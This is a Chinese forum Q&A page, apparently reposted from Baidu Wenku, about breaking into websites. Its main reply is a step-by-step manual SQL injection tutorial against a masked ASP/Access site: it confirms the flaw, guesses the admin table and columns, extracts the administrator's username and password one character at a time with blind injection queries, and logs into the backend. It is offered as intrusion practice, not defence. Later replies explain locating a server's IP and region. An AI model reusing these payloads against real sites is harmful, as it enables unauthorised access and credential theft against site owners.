江苏农林职业学院环境:黑客来...关于入侵网站的

来源:百度文库 编辑:杭州交通信息网 时间:2024/05/06 12:06:02
入侵网站中大部分用流光,明小子 的扫描工具来扫描
但是很多都是 扫描不进去的...
比如说网站的服务器放在哪的...怎么样才能知道

学了黑客这么久,很多朋友只会用明小子扫啊扫的,注入大家都知道,可真正叫你手工注入又有多少人会呢.今天,我就拿我刚才检测的站来给大家做个手工注入的教程,希望大家能活学活用.
准备:
1.欠黑站点:) www.**********.com(这个是我假设的)
2.工具:一双打字的手. 忽忽~~
OK,进入这个站点www.**********.com ,8错,挺美观的,随便点个消息看看.出现了www.**********.com/list.asp?id=511 不晓得站点的安全如何 习惯性的+个'号,问题出来了
Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'articleID=477'' 中。

/list.asp,行 12
马上+个and 1=1 回显正常 and 1=2 回显错误:找不到这篇文章
哈,看来是存在注入了
(and 1=1 回显正常 and 1=2 回显错误 则站点存在注入的可能很大)
先检测表名www.**********.com/list.asp?id=511 and 0<>(select count(*) from admin)
显示正常,看来表名是admin 了
OK ,继续检查字段名的www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)>0)
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(password)>0)
都显示正常 说明字段名是username password
下面检查帐号个数www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)=5)
显示错误 看来不是常用的admin了,继续猜
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)>5)
显示正确 看来个数大于5
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)>10)
显示错误 忽忽范围在5~10之间
猜了几个后确定是8位数
下面猜密码 www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(password)>10)
显示正常,Go on!
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(password)>11)
显示错误 大于10 不大于11 不用我说了吧 密码11位数
这么说帐号是8位 密码是11位
下面来猜帐号咯!(我是猜asc码,==还得用转换工具转下)
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>50
显示正常,大于50
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>150
错误 继续
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>130
错误,范围在缩小咯
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>125
显示错误,继续.... 最后猜到是119 转换后得w
继续猜帐号第二位
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,2,1)) from Admin)=111
111转换后得o
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,3,1)) from Admin)=115 得s
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,4,1)) from Admin)=104 得h
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,5,1)) from Admin)=105 得i
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,6,1)) from Admin)=122 得z
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,7,1)) from Admin)=104 得h
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,8,1)) from Admin)=117 得u
说明帐号是:woshizhu
继续猜密码
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(password,1,1)) from Admin)>100
显示错误
......
......
最后得出密码是:woshizhu123
终于把帐号和密码猜出来了,找到后台www.**********.com/admin/login.asp直接登入!

一个站点就这样被手工入侵了.看来这个站的安全可以用欠黑来形容了
不知道大家现在是不是对注入有进一步的了解了.希望大家能好好学习!多多交流!

网站服务器可以用ip查询查到他的大致区域
http://www.ip138.com/

先用ping口令查出对方网站的IP然后到楼上说的那个网站上查IP所在地

要知道服务器在哪非常的简单..明小子不是就有那功能么.?旁注的时候.输入要入侵的域名.在点>>.不是就会查出IP么.?要想知道是什么地区的.可以照2楼说的.去网站查.也可以用一些工具.轻松的可以得到.